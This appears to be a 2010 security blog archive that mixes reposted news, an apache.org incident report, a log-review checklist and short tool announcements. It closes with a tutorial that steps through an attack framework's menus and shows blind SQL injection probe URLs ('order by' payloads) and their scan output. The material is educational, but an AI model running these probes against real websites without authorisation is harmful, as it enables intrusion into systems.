Thursday, April 29, 2010

Howto: DNS Enumeration


A penetration testing is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source. The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures.

The first step of penetration testing or more accurately called information security testing is information gathering. Information gathering is part of the preparatory pre-attack phase and involves accumulating data regarding a target's environment and architecture, usually for the purpose of finding ways to intrude into that environment. Information gathering can reveal system vulnerabilities and identify the ease with which they can be exploited. This is the easiest way for attacker to gather information about computer systems and the companies they belong to. The purpose of this phase is to learn as much as you can about a system, its remote access capabilities, its ports and services, and any specific aspects of its security.

Using a combination of tools and techniques, attackers can take an unknown entity and reduce it to a specific range of domain names, network blocks, subnets, routers, and individual IP addresses of systems directly connected to the Internet, as well as many other details pertaining to its security posture. Although there are many types of information gathering techniques, they are primarily aimed at discovering information related to the following environments: Internet, intranet, remote access, and extranet.

To read more details, you can download my article here:

Sunday, April 25, 2010

Manual Verification of SSL/TLS Certificate Trust Chains using Openssl

I found two article about verification of SSL/TLS certificate Trust Chain by using manual verification technique.

Part One:
http://blog.taddong.com/2010/04/manual-verification-of-ssltls.html
Part Two:
http://blog.taddong.com/2010/04/manual-verification-of-ssltls_24.html

To read more, please refer to this link:

http://isc.sans.org/diary.html?storyid=8686

Friday, April 16, 2010

CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review. To download it, click here:
http://www.securitywarriorconsulting.com/security-incident-log-review-checklist.pdf


General Approach
  • Identify which log sources and automated tools you can use during the analysis.
  • Copy log records to a single location where you will be able to review them.
  • Minimize “noise” by removing routine, repetitive log entries from view after confirming that they are benign.
  • Determine whether you can rely on logs’ time stamps; consider time zone differences.
  • Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
  • Go backwards in time from now to reconstruct actions after and before the incident.
  • Correlate activities across different logs to get a comprehensive picture.
  • Develop theories about what occurred; explore logs to confirm or disprove them.

Typical Log Locations
  • Linux OS and core applications: /var/log
  • Windows OS and core applications: Windows Event Log (Security, System, Application)
  • Network devices: usually logged via Syslog; some use proprietary locations and formats.
What to Look for on Linux
  • Successful user login- “Accepted password”, “Accepted publickey”, "session opened”
  • Failed user login- “authentication failure”, “failed password”
  • User log-off- “session closed”
  • User account change or deletion- “password changed”, “new user”, “delete user”
  • Sudo actions- “sudo: … COMMAND=…”, “FAILED su”
  • Service failure- “failed” or “failure”
What to Look for on Windows
Event IDs are listed below for Windows 2000/XP. For Vista/7 security event ID, add 4096 to the event ID.Most of the events below are in the Security log; many are only logged on the domain controller.
  • User logon/logoff events -Successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc
  • User account changes- Created 624; enabled 626; changed 642; disabled 629; deleted 630
  • Password changes- To self: 628; to others: 627
  • Service started or stopped- 7035, 7036, etc.
  • Object access denied (if auditing enabled)- 560, 567, etc
What to Look for on Network Devices
Look at both inbound and outbound activities. Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.
  • Traffic allowed on firewall- “Built … connection”, “access-list … permitted”
  • Traffic blocked on firewall- “access-list … denied”, “deny inbound”; “Deny … by”
  • Bytes transferred (large files?)- “Teardown TCP connection … duration … bytes …”
  • Bandwidth and protocol usage- “limit … exceeded”, “CPU utilization”
  • Detected attack activity- “attack from”
  • User account changes- “user added”, “user deleted”, “User priv level changed”
  • Administrator access- “AAA user …”, “User … locked out”, “login failed”
What to Look for on Web Servers
  • Excessive access attempts to non-existent files
  • Code (SQL, HTML) seen as part of the URL
  • Access to extensions you have not implemented
  • Web service stopped/started/failed messages
  • Access to “risky” pages that accept user input
  • Look at logs on all servers in the load balancer pool
  • Error code 200 on files that are not yours
  • Failed user authentication- Error code 401, 403
  • Invalid request- Error code 400
  • Internal server error- Error code 500 
Other Resources

How to choose your Information Security Training

Article taken from: http://www.offensive-security.com/blog/offsec/questions-information-security-training-provider/

In the past couple of years, the economy has struck hard on organizations seeking to educate their employees. Training budgets have been cut down, and choosing the right course that will give you real Return on Investment is not an easy job. This is especially true in the offensive InfoSec arena, where training standards and qualifications are weakly defined. So how can you make sure your getting your money’s worth ?
Welcome to our “10 questions you should be asking your InfoSec Training Provider“.

1. What are the objectives of the training ?

What will the training do for you ? Anyone promising you that you will be a “hardcore penetration tester” or a “security expert” after their 5 day class has never run a pentest, or otherwise has no clue what they are talking about. Learning *any* profession in 5 days is unrealistic, let alone one as complex as IT Security, or penetration testing. This is one of the first questions I ask before attending a training… its allows me to set my goals for the course and gives me a baseline for my expectations.

2. What topics does the course cover ?

Always read the syllabus of the course you want to attend, before you attend it.  Try finding other people who have taken the class, (if possible) and get their opinion. Try to see if the syllabus follows a reasonable methodology, or if it’s just a collection of topics. If you see a list of 1500 tools on the syllabus – expect to spend around 0.6 minutes per tool. 

3. Who is your trainer ?

Are they well known in their field ? Do they have training experience ? Are they involved in the security community ? Do they practice what they preach? Although these are 4 separate questions, they all relate to one thing – the ability of the trainer to provide the goods you paid so dearly for. Finding a GOOD InfoSec trainer is NOT easy. Most computer genii are usually lacking in their social skills – something a good trainer must have.

4. What previous reviews does the class have ?

Running a few internet searches for the name of your class, or the name of the trainer is a must. Find out what people have to say about their experiences – during and after the class. Although you can’t believe *everything* on the internet, taking an average of all the reviews will usually give you a solid idea of what you are getting into.

5. What is the ratio of students to trainers ?

How many students will there be in the class ? Some training providers cram more than 30 students in one class – often with a single instructor. During a 5 day period, a trainer can’t give personal attention to 30 people, no matter what. In general, smaller classes mean a more intimate environment, more attention from the trainer, and a more productive and engaging experience.

6. What is the ratio between theory and hands-on exercises ?

Remember the famous saying “In theory, there is no difference between theory and practice – But in practice, there is”. If you don’t exercise what you learn, you are less likely to retain or understand it as nothing replaces practical experience. Ask for a rough ratio estimate for “theory VS exercise” for your class – anything above 40% class-time spent on exercises is a good sign. Of course, this greatly depends on the quality of the exercises too.

7. How often is the course updated ? Is the material relevant to modern day situations ?

Learning methods and techniques on antiquated systems will bring you little benefit in the real world. Hacking a Windows 2000 SP4 machine with RCP DCOM doesn’t cut it any more. On the other hand, don’t expect to learn “Bypassing Windows 7 Stack Protection” in an introductory buffer overflows course. You need to gauge the balance between these two elements carefully.

8. What are the pre-requisites for the class ?

How should you prepare yourself for the class? Do you need to refresh your knowledge on certain topics? Nothing is more frustrating than coming to a class, and then lagging behind because you are not up to par with the class requirements. Not good for your learning experience, and not good for your self esteem – on the other hand “no pre-requisites required” might indicate lack of depth. If the pre-requisites were defined well by the training provider, it’s definitely a good resource to use to evaluate the relevancy of the course to you.

9. Is there a certification involved ? What is it’s value ?

The “value” of a certification can be measured in the real world using two main indicators:
  • The “market value” of the certification – how popular is this certification in the workforce ? Is the certificate recognized and appreciated by the industry ? And of course, will it help you get a (better) job ?
  • The “practical value” of the certification – or as Eddie Murphy would say “WHAT HAVE YOU DONE FOR ME LATELY?”.  What real world skills does the certificate prove? If it proves you can memorize 100 questions, you might not be up to the job when confronted with a real world scenario.

10. What post training benefits are provided?

What ongoing benefits will you get from the training provider, if any ? Is there a continuation path for the training ? Will the trainers be available for future questions or issues that may arise ? Is there a student community you can join, to discuss the course with other student ? Or in other words, what kind of “post customer service” can you expect ?
These 10 questions should cover all the important elements you should verify before committing your valuable time and limited training budget to any service provider. The average person only gets a limited number of training opportunities per year, therefore you should always maximize the return you receive.

Proof of Concept for MS10-006 SMB Client-Side Bug

This is a technic to automate with no user interaction at all SMB client side bug exploitation targeting the Domain Master Browser (DMB) or PDC  (only the PDC can be a DMB)which is basicaly the perfect target in a pentest. Targeting the DMB is perfect, simply because if you control that box, you'll control all computer joined to this box tree.

Since the SRD is once again downplaying SMB client side bug i think it's important to share this kind of tricks.

It's also important to mention that Browser and NBNS abusing is well known since a long time, as theses protocols wasn't developed with security in mind, this blog post is a simple real case example.

There's two way to automate SMB client side bug;

  • NBNS Spoofing (require some "kind" of user interaction in some way,   anyways  in a corporate network it works pretty well)
  • Browser Protocol Abusing (the funny one)
In this case I will cover a form of Browser Protocol Abusing.

To see more details:
http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html

Wednesday, April 14, 2010

Top 5 Security No Brainers for Businesses

Occasionally folks forget about covering the fundamentals of security and start off down a rabbit hole following some shiny new technology that turns out to be just a rat hole. With today's limited security budgets you need to be sure that you've adequately covered your highest risk areas before moving on to other things. The high-risk areas are, of course, not the same for everyone and will change on you fairly frequently. The bad guys are always mixing it up; the attacks we see prevalent today are not those that we saw just a few years ago. Thus the reason for this article, to take a look at the top 5 security solutions you can put in place today to cover the widest scope of current and emerging threats. In many respects these solutions are considered obvious "no brainers". But, you'd be surprised by how many companies (big and small) that don't have them in place. Many times it is the obvious that temporarily escapes us (or at least escapes those holding the purse strings ☺)
These 5 items working together will stop more cyber attacks on your data, network and users than any other 5 items in the marketplace today. There are lots of other very useful security solutions on the market but when it comes to picking the top five most effective and readily available ones here are my choices:
Firewall – The keystone of network defense for a decade or more is still required for solid foundational security. Its job is still fairly simplistic; control what data flows can go where. Without firewalls in place to drop unwanted flows, your job of protecting your assets increases exponentially. Firewalls need to be present at your external perimeters but also inside of your network for secure segmentation of data. Deploying firewalls internally is a relatively new best practice. It is largely driven by the dissolution of any sense of a tangible, reliable network border that can differentiate trusted network traffic from untrusted external network traffic anymore. Our nice clean Internet border of old just doesn't exist anymore in modern networks. What has also recently changed is that firewalls are getting smarter and more granular in there definition of data flows. It is now common for a firewall to be able to control a data flow based on the type of application or even application function it represents. For example, a firewall can block a SIP voice call based on what number was dialed.
Secure Router (FW, IPS, QoS, VPN) – Routers are everywhere in most networks. By tradition they have been used just as traffic cops for flows. But modern routers can do so much more than that! Routers are chock full of security features, sometimes even more so than a modern firewall. Most routers in the industry today are capable of robust firewalling features, some semblance of useful IDS/IPS functionality, robust quality of service and traffic management tools and of course strong Virtual Private Network data encryption features. The list doesn't stop there either. The power of modern routers to add to the security of your network is commonly overlooked today. With modern vpn technology it is fairly straight-forward to start encrypting all of the data crossing your WAN links, but very few people do so. It is also too atypical that folks use the firewall functions and IPS features in their routers. Turn 'em on and see your security posture improve!
Wireless WPA2 – This is the no-brainer of them all. If you aren't using WPA2 wireless security then stop what you are doing and form a plan to start doing so. Many other methods of wireless security are not secure and can be compromised in minutes. Don't make it easy for the bad guys, turn on WPA2 with AES encryption today.
Email Security – We all know email is currently the top attack vector used by black hats. Viruses, malware and worms all love to use email as their propagation method. Email is also the top way we loose most of our sensitive data. On top of the threats and data loss we experience through email we also have simple junk mail, spam. About 90% of all email sent today is spam! A good email security solution will get rid of the junk and filter out the malicious stuff as well. It is likely that if you are getting a lot of spam through your current system then you are getting even more malware through it. The thought process being that the spam features in email security gateways is usually the focus, core competency of the product. So if it is not doing its job dropping spam then it certainly isn't doing its job catching malware and data leakage.
Web Security – Threats coming from port 80 and 443 are rising faster than any other threat vector today. The expanding complexity of web based attacks necessitates that a company deploy a robust web security solution. Simple URL filtering has been with us for years and it is a core component to web security for sure. However, web security needs more than just URL filtering it needs AV scanning, malware scanning, IP reputation awareness, dynamic URL categorization techniques and Data leakage prevention functions. Attackers are compromising high profile sites at such an alarming rate that if we just relied on URL white list, black list filtering we'd have nothing left in the white list anymore! Any web security solution has to be able to dynamically scan web traffic to make a decision on its validity. Of all the solutions listed here, it is in web security where taking the risk of deploying a cutting edge, best of breed solution will pay of the most. The other solutions on the list are, for the most part established and mature. Web security solutions bells and whistles are coming out as fast as the hackers are building new attacks. Well ok, not quite that fast.
What are your thoughts on my choices for top 5 security no brainers? Think I got it wrong or right? If you had to add a sixth one what would it be?
If your company doesn't have all of these 5 in place today, go bang on some doors and raise the roof on awareness! Don't let it all burn!

The opinions and information presented here are my PERSONAL views and not those of my employer. I am in no way an official spokesperson for my employer.

Article taken from: http://www.networkworld.com/community/node/59971

How security professionals monitor their kids

April 12, 2010 (CSO) Cell phones, texting, IM, e-mail, Facebook, MySpace -- kids are interconnected today in ways hardly imagined two decades ago. But these technology-based communication platforms also enable new forms of an age-old parenting strategy: monitoring your kids.
Who are they talking to? What are they talking about? Are they going where they said they are going?
Most of us with children think about this stuff. But parents who work by day as security professionals live in a heightened state of risk awareness, and also have the expertise and the tools to monitor kids' behavior and communication in many ways.
[Also see: Social media risks: The basics]
Is it any easier to put the proper measures in place to ensure your child's security since you already have an expertise in this area? Or do you go overboard because of you are hyperattuned to risk? And what is the right balance of freedom and guidance to provide for kids?
Turns out it was tricky issue before social networking, and remains tricky now. Here are views and strategies collected from an array of security professionals.
'Spying' on your kids?
Martin McKeay, a CISSP and security consultant who maintains a popular network security web site and blog, recently found out how divided security professionals are on the issue of monitoring children. McKeay, the father of two boys aged 8 and 10, received an intriguing message recently from someone on a mailing list who wanted his opinion.
"It asked 'What kind of software can I use to spy on my children and read their every email?'" said McKeay, who was slightly taken aback by the wording and the person's obvious, no-bones-about-it attitude that they intended to pry into their kids' lives without warning or limit.
"I consider that going over the top. So I went on Twitter and asked other people: 'How do you think this should be handled? Is it through monitoring software, or parental relationships?'" McKeay recounted. "With rare exceptions, most people said both. But there were some strong opinions about monitoring what your kids do."
McKeay said he was surprised that his responses, mostly from other security professionals, revealed many were willing to do at least some covert monitoring with software programs without the kids' knowledge or consent. The majority felt open and frank discussion, along with some disclosed parental control with products such as Net Nanny, and other similar programs that block web sites and monitor activity, was the best approach.
But he estimates about 25 percent of those who answered his question thought monitoring all actions without telling their kids they were doing so was OK.
"I kind of expected in the security community that more people would realize some of the dangers of that kind of secret monitoring. But I guess when it comes to your kids, most people seem to be more concerned with keeping them safe online than the potential impact on the relationship."
By danger, McKeay means loss of trust when the child realizes he is being "spied on," as he puts it. He believes secret, and also open-but-excessive, monitoring of a child's activities infringes on a kid's privacy rights and will set parents up for potential damage to the relationship with their children in the future. He also thinks leaving them no room to make mistakes means they won't learn the security skills they need when navigating the dangers of the internet.

To see full article, read here:
http://www.computerworld.com/s/article/print/9175373/How_security_professionals_monitor_their_kids?taxonomyName=Security&taxonomyId=17

apache.org incident report for 04/09/2010

apache.org incident report for 04/09/2010

Apache.org services recently suffered a direct, targeted attack against our infrastructure, specifically the server hosting our issue-tracking software.

The Apache Software Foundation uses a donated instance of Atlassian JIRA as an issue tracker for our projects. Among other projects, the ASF Infrastructure Team uses it to track issues and requests. Our JIRA instance was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS.
Password Security

If you are a user of the Apache hosted JIRA, Bugzilla, or Confluence, a hashed copy of your password has been compromised.

JIRA and Confluence both use a SHA-512 hash, but without a random salt. We believe the risk to simple passwords based on dictionary words is quite high, and most users should rotate their passwords.

Bugzilla uses a SHA-256, including a random salt. The risk for most users is low to moderate, since pre-built password dictionaries are not effective, but we recommend users should still remove these passwords from use.

In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them.
What Happened?

On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text:

ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured]

Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administators clicked on the link. This compromised their sessions, including their JIRA administrator rights.

At the same time as the XSS attack, the attackers started a brute force attack against the JIRA login.jsp, attempting hundreds of thousands of password combinations.

On April 6th, one of these methods was successful. Having gained administrator privileges on a JIRA account, the attackers used this account to disable notifications for a project, and to change the path used to upload attachments. The path they chose was configured to run JSP files, and was writable by the JIRA user. They then created several new issues and uploaded attachments to them. One of these attachments was a JSP file that was used to browse and copy the filesystem. The attackers used this access to create copies of many users' home directories and various files. They also uploaded other JSP files that gave them backdoor access to the system using the account that JIRA runs under.

By the morning of April 9th, the attackers had installed a JAR file that would collect all passwords on login and save them. They then sent password reset mails from JIRA to members of the Apache Infrastructure team. These team members, thinking that JIRA had encountered an innocent bug, logged in using the temporary password sent in the mail, then changed the passwords on their accounts back to their usual passwords.

One of these passwords happened to be the same as the password to a local user account on brutus.apache.org, and this local user account had full sudo access. The attackers were thereby able to login to brutus.apache.org, and gain full root access to the machine. This machine hosted the Apache installs of JIRA, Confluence, and Bugzilla.

Once they had root on brutus.apache.org, the attackers found that several users had cached Subversion authentication credentials, and used these passwords to log in to minotaur.apache.org (aka people.apache.org), our main shell server. On minotaur, they were unable to escalate privileges with the compromised accounts.

About 6 hours after they started resetting passwords, we noticed the attackers and began shutting down services. We notified Atlassian of the previously unreported XSS attack in JIRA and contacted SliceHost. Atlassian was responsive. Unfortunately, SliceHost did nothing and 2 days later, the very same virtual host (slice) attacked Atlassian directly.

We started moving services to a different machine, thor.apache.org. The attackers had root access on brutus.apache.org for several hours, and we could no longer trust the operating system on the original machine.

By April 10th, JIRA and Bugzilla were back online.

On April 13th, Atlassian provided a patch for JIRA to prevent the XSS attack. See JRA-20994 and JRA-20995 for details.

Our Confluence wiki remains offline at this time. We are working to restore it.
What worked?
  • Limited use passwords, especially one-time passwords, were a real lifesaver. If JIRA passwords had been shared with other services/hosts, the attackers could have caused widespread damage to the ASF's infrastructure. Fortunately, in this case, the damage was limited to rooting a single host.
  • Service isolation worked with mixed results. The attackers must be presumed to have copies of our Confluence and Bugzilla databases, as well as our JIRA database, at this point. These databases include hashes of all passwords used on those systems. However, other services and hosts, including LDAP, were largely unaffected.

What didn't work?
  • The primary problem with our JIRA install is that the JIRA daemon runs as the user who installed JIRA. In this case, it runs as a jira role-account. There are historical reasons for this decision, but with 20/20 hindsight, and in light of the security issues at stake, we expect to revisit the decision!
  • The same password should not have been used for a JIRA account as was used for sudo access on the host machine.
  • Inconsistent application of one time passwords; We required them on other machines, but not on brutus. PAM was configured to allow optional use of OPIE, but not all of our sudoers had switched to it.SSH passwords should not have been enabled for login over the Internet. Although the Infrastructure Team had attempted to configure the sshd daemon to disable password-based logins, having UsePAM yes set meant that password-based logins were still possible.
  • We use Fail2Ban for many services, but we did not have it configured to track JIRA login failures.
To see full article, please read the link below:
https://blogs.apache.org/infra/entry/apache_org_04_09_2010

How to unwrap PL/SQL

The Oracle wrap utility can be used to obfuscate PL/SQL code, to ensure it can't be easily read. The wrapping process for Oracle 9g described by Pete Finnigan, but for 10g and 11g it still remains a bit of a mystery.
To see pdf file about How to Unwrap PL/SQL, see the link below:
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Finnigan.pdf

The unwrapping steps for 10g are nicely described in the Oracle Hacker's Handbook, but the actual substitution table needed to decode the package is omitted. A lot of people seem to know how to do it though, there is even an online unwrapper available. See the link below:
http://hz.codecheck.ch/UnwrapIt/Unwrap.jsp
A Russian-made closed source tool is also available, but tends to upset virus scanners.To download unwrap.py, please click the link below:
http://www.teusink.net/unwrap.py

For more details, please refer here:
http://blog.teusink.net/2010/04/unwrapping-oracle-plsql-with-unwrappy.html

Tuesday, April 13, 2010

Netsparker® Community Edition

We are proud to announce Free Netsparker® Community Edition. It's a free edition of our False Positive free scanner Netsparker for the community so you can start securing your website now. It's user friendly, fast, smart and as always False Positive Free.

Netsparker® Community Edition shares many features with Netsparker® Professional and just like Netsparker Professional, Community Edition is also False Positive Free. It can detect SQL Injection and Cross-site Scripting issues better than many other scanners (if not all), and it's completely FREE.

http://www.mavitunasecurity.com/communityedition/


Very powerful! Nice!! Try it lorr...better than other scanner

Wednesday, April 07, 2010

Introducing Meta-Information XSS

A few months back I was playing around with DNS text records and started thinking about what I could include in them. Given that so much of my time is spent with web application security, my first attempt was a simple XSS. Then I just needed a web page to display the information, I started looking at websites that allow you to perform DNS resolution and websites that verify SPF filters. None of these websites filtered the data. This lead me to start looking at other types of meta-information (or metadata) we access, manipulate and view on a daily basis but never really consider as potentially harmful. Other places that came up included: Whois data, SSL Certificate info, and Server Banners (SMTP/HTTP). I'm sure there are others but these are the ones I looked at.

As I was looking into contacting the various websites, I started thinking about how you could classify this type of XSS. While data has to be provided in some of the requests, you aren't providing the attack, so it's not really reflected. At the same time nothing is stored on the server to be displayed to future users (at least nothing malicious), so it's not really persistent. It's also definitely not DOM based. That lead to the conclusion that this needed a new classification and I decided to go with Meta-Information Cross Site Scripting or miXSS (pronounced my-XSS).

To download whitepaper and presentation:
http://blog.ncircle.com/blogs/vert/archives/2010/04/introducing_metainformation_xs.html

Friday, April 02, 2010

Digital Forensics Case Leads: New Gear, New PDFs Abuse, and Defeating TrueCrypt

Logicube releases new forensics gear, Didier Stevens discovers a new way to do interesting things with a PDF and a cooperative user, and Passware provides a means to defeat TrueCrypt.

Logicube has released two devices which look interesting. The MPFS or Massive Portable Forensic Storage provides up to 8TB of storage capacity for acquiring multiple images. The device may be attached to a forensic analyst’s workstation via firewire, USB, or eSATA. The unit is compatible with Logicube’s Dossier imager and Logicube’s second new device, the NETConnect which as the name suggests, allows network access to forensic images. Based on the description, NETConnect is essentially a file server which enables multiple investigators to access forensic images as soon as they are acquired. The device supports Windows, Mac, and Linux and includes support for CIFS and NFS. (I’ve not had the opportunity to test either device but if Logicube or anyone else wants to send me a set, I will be happy to do a write up.)

If you’ve ever analyzed a PDF, you’ve probably used a tool created by Didier Stevens. Didier has figured out a way to make certain PDF readers execute embedded binaries. Check out his explanation in Good Reads.

Disk encryption in various forms is becoming more common when it comes to incident response and forensics. In response to its customer’s requests, Passware has updated their flagship product to handle TrueCrypt. Their product also has support for BitLocker.

To read more:
http://blogs.sans.org/computer-forensics/2010/04/01/digital-forensics-case-leads-gear-pdfs-abuse-defeating-truecrypt/

Sharing vs. your privacy on Facebook

(CNN) -- Facebook is, by its nature, a social experience.

But as the undisputed king of social networking expands ways for its users to interact, it's raising more questions about how much of their information is made available to people they don't know.

In some cases, users may not even realize it's happening.

One example is the hundreds of thousands of developers approved by Facebook to create games, quizzes and other applications. Some of those developers are able to access basic information about users after a Facebook friend has started using their application.

Facebook provides pages of instructions on how people can tighten up their privacy settings to hide their personal information from other users and outside applications.

But some observers say that too many of the site's estimated 400 million users don't know how to do so.

Microsoft researcher and social-media analyst Danah Boyd, speaking at last month's South by Southwest Interactive festival, said none of the "non-techy" users she talked to about their privacy settings knew how they were configured.

"I ask them what they think their settings are and then ask them to look at their settings with me. I have yet to find someone whose belief matched up with their reality," said Boyd, a keynote speaker at the Austin, Texas festival. "That is not good news."

In January, Facebook announced that 35 percent of its users had tweaked their privacy settings after a December change that made more information public.

To be sure, that represents millions of users. But Boyd said that can't possibly be all the people who want at least some of the privacy features that Facebook's new default settings changed.

"Are there Facebook users who want their content to be publicly accessible? Of course," she said. "But 65 percent of all Facebook users? No way."

For Facebook, it's a balancing act. The site wants to give users the privacy they've come to expect, but at the same time make information available to create experiences that will compete with other emerging applications such as Foursquare and Twitter.

Twitter, as well as photo sharing sites such as Picasa, default to open access, making them more accessible by outside applications and search engines. Facebook's material that is public can also be searched -- for example, by Google's new social search feature -- while private material cannot.

"The experience that we're trying to provide through the Facebook platform is fundamentally a social one," said Simon Axten, a manager on Facebook's public policy team. "There are some really interesting and useful applications that have come out of that development that really allow people to have a social experience that involves the people that they are friends with."

Axten said the rules of the road for developers are pretty strict. Basically, developers are instructed to collect only the data they need for their application. Anything else could land them in trouble, he said.

For example, an application that lets users send friends an electronic greeting card might need to know their birthday or anniversary. Games that require players to work together must know which other friends play the game so it can send them alerts when they need to act.

Axten said Facebook can take "a spectrum of actions" when it discovers inappropriate use of people's information -- from warning developers who may not realize they're misusing the data to disabling a developer's access to the site.

No application can access a user's most sensitive data, such as contact information, according to Facebook. And the site announced late last year that they're working on a new approval process that will require an application to more specifically state what information it wants to access.

Mike Rasmussen is president of Republic of Fun, a game company with a crowdsourcing app on Facebook that lets users give feedback and advice on current games and, in the near future, to suggest new ones. He said Facebook's list of rules for developers is a strict one.

"Developers, if they were creative, could certainly abuse it," he said. "But with Facebook, it's almost not worth it. They make it so easy to get what you really need, unless you're being malicious."

Rasmussen said his application stores a single identifier for users and does not even keep their names. He said he's only heard "second- or third-hand" about developers getting into trouble for pushing the boundaries.

Evan Brown, a Chicago technology and intellectual-property attorney, said he's not familiar with any legal cases involving private information gathered by a Facebook developer.

He said Facebook's rules governing outside developers are designed so the site may legally expel a developer easily.

"They have the sole discretion to determine what the crime is, and they have the sole discretion to determine the punishment," said Brown, who blogs about Internet legal issues.

Facebook's Axten said a team monitors complaints, which users can file simply by clicking a link that's on every Facebook application. The team also regularly monitors popular and fast-growing applications and conducts random checks, he said.

And of course there are personal settings. A user can click the "Account" tab at the top right of their Facebook home page, then scroll down to "Application Settings" and "Privacy Settings" to make changes.

Increasing awareness about that ability is what Facebook and other social-networking sites need to work harder on, Boyd said.

"While you want your services to go viral, help users walk through the value proposition first," she said. "Not through a video, but through an experience."

Article from: http://www.cnn.com/2010/TECH/ptech/04/01/facebook.developers.privacy/index.html

Thursday, April 01, 2010

Blind SQL Injection: Simple and Easy Method Using Tools


Finding Vulnerable URL & Parameter

Before you can perform Blind SQL Injection testing, you must find a vulnerable URL or path from the website where you can inject malicious code or character to the vulnerable parameter on the website. You need to find out why your website is vulnerable to Blind SQL injection before you can perform SQL injection attack to the vulnerable parameter. To find a vulnerable URL path, you can use hackinganyway.py to find possible Blind SQL injection:

Step 1: You must run hackinganyway.py python script. Enter 1 for this option:
############################################
 # PENETRATION TESTING FRAMEWORK PRE RELEASE# 
 # Copyright (C) 2009 By Ashikali                                 #
 # HACKING ANYWAY FRAMEWORK V 1.0                   #  
 # General Menu                                                           #
 # Ashikali1208 [at]yahoo[dot]com                                #
 # www.Ashikali.com                                                    #
 # GNU General Public License                                      #
 ############################################
 Enter 1 For Let Me In Framwork
 Enter 2 For View Special Thanks Page
 Enter 3 For Download Resource
 Enter 4 For About This Frameworks
 Enter 5 For Credit Page
 Enter 6 For Exit Completely
 Enter Your Choice Here: 1

Step 2: Select 4 if you want to use proxy option.
################################################
#    PENETRATION TESTING FRAMEWORK PRE RELEASE         #
#    Copyright (C) 2009 By Ashikali                                          #
#    HACKING ANYWAY FRAMEWORK V 1.0                            #
#    PROXY SECTION                                                                #
#    Ashikali1208[at]yahoo[dot]com                                          #
#    www.Ashikali.com                                                             #
################################################
Do You want To Use Proxy??
Enter 1 For Enter In Main Menu With This Proxy
Enter 2 For Get The Proxy
Enter 3 For Taste The Proxy
Enter 4 For Load The Proxy
Enter 5 For Remove Proxy
Enter 6 For Change Proxy
Enter 7 For Help Of This Task
Enter 8 For Exit Fom Current Menu
Enter 9 For Exit Completely
Enter Your Choice Here: 4
Step 3: Enter proxy address and port.
Enter the Proxy Address Here: 127.0.0.1
Enter the Port Here: 3128
[+] Testing Proxy...
[-] Proxy: 127.0.0.1:3128 Successfully Loaded
Process Done Please Press Any key To Go Back In Previous Menu...

Step 4: Select 1 option to go to Main Menu
 #################################################
 #    PENETRATION TESTING FRAMEWORK PRE RELEASE         #
 #    Copyright (C) 2009 By Ashikali                                         #
 #    HACKING ANYWAY FRAMEWORK V 1.0                            #
 #    PROXY SECTION                                                                #
 #    Ashikali1208 [at] yahoo [dot] com                                      #
 #    www.Ashikali.com                                                             #
 #    GNU General Public License                                               #
 #################################################
 Do You want To Use Proxy ??
 Enter 1 For Enter In Main Menu With This Proxy
 Enter 2 For Get The Proxy
 Enter 3 For Taste The Proxy
 Enter 4 For Load The Proxy
 Enter 5 For Remove Proxy
 Enter 6 For Change Proxy
 Enter 7 For Help Of This Task
 Enter 8 For Exit Fom Current Menu
 Enter 9 For Exit Completely
 Enter Your Choice Here: 1

Step 5: Select option 2 for Evaluating the Vulnerability of Target
 ################################################
 #  PENETRATION TESTING FRAMEWORK PRE RELEASE          #
 #  Copyright (C) 2009 By Ashikali                                           #
 #  HACKING ANYWAY FRAMEWORK V 1.0                             #
 #  Main Menu                                                                          #
 #  Ashikali1208[at]yahoo[dot]com                                           #
 #  www.Ashikali.com                                                              #
 #  GNU General Public License                                                #
 ################################################
 Enter 1 For Gathering Basic Information Of Target
 Enter 2 For Evaluating The vulnerability Of Target
 Enter 3 For Brute Forcing To The Target
 Enter 4 For Encryption
 Enter 5 For Attacking
 Enter 6 For Supported Tools
 Enter 7 For Help Or Detail
 Enter 8 For Changing, Removing Proxy Or For Exit From Current Menu
 Enter 9 For Exit Completly
 NOTE:- Currently You Are Using Proxy 127.0.0.1:3128
 Enter Your Choice Here : 2
Step 6: Select option 3 to find Blind SQL injection from a website.
 ################################################
 #  PENETRATION TESTING FRAMEWORK PRE RELEASE          #
 #  Copyright (C) 2009 By Ashikali                                           #
 #  WEB APPLICATION SCANNING                                           #
 #  Ashikali1208[at]yahoo[dot]com                                           #
 #  www.Ashikali.com                                                              #
 #  GNU General Public License                                                #
 ################################################
 Enter 1 For Port Scanning
 Enter 2 For Finding SQL Injection From Website
 Enter 3 For Finding Blind Injection From Website
 Enter 4 For Finding Local File Includation From Website
 Enter 5 For Finding Remote File Includation From Website
 Enter 6 For Finding Cross Site Scripting From Website
 Enter 7 For CGI Scanning
 Enter 8 For Help Of This Task
 Enter 9 for for exit from Current menu
 Enter 10 For Exit Completly
 NOTE:- Currently You Are Using Proxy 127.0.0.1:3128
 Enter which op u wana perform : 3

Step 7: Enter the website name that you want to test.
            Enter Your Site Name Here: www.mywebsite.com
If Web Identify Sucsessfully Its Will logged at webscan.txt you May check the log after scanning finished
Woot Woot Massage will Idntify That Web Is Vulnarable
[-]Saving response length for blind sqli at:http://www.mywebsite.com/viewnews.php?pageid=82+order+by+1--
[-]Saving response length for blind sqli at: http://www.mywebsite.com/viewnews.php? pageid=82+order+by+300--
[+]W00t !! Found Possible Blind sqli Bug at: http://www.mywebsite.com/viewnews.php? pageid=82+order+by+300--
[+]Possible server's hole saved at webscan.txt
